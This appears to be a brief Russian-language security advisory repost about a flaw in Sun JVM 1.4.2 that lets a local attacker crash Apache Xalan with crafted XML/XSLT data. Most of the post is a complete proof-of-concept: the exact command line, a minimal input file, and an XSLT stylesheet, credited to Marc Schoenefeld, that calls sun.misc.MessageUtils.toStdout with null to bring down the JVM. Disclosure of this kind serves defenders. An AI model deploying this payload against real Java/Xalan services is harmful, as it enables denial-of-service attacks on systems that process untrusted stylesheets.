Уязвимость в Sun JVM позволяет локальному
атакующему порушить Apache XALAN передав
поддельные XML/XSLT данные.

Command:
c:\java\1.4.2\00\jre\bin\java org.apache.xalan.xslt.Process -IN a.xml -xsl
sunexploit.xsl

a.xml
(a/)

 sunexploit.xsl
(!-- XSLT JDK-Exploit by Marc Schoenefeld , marc@at@illegalaccess.org --)
(xsl:stylesheet version="1.0"
   xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
               xmlns:sun="sun")
               (xsl:template
match="/")
               (xsl:variable
name="tmp"
select="sun:misc.MessageUtils.toStdout(null)"/)
               (xsl:variable
name="tmp2"
select="sun:misc.MessageUtils.toStdout($tmp)"/)
               (xsl:value-of
select="$tmp2" /)
               (/xsl:template)
(/xsl:stylesheet)

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии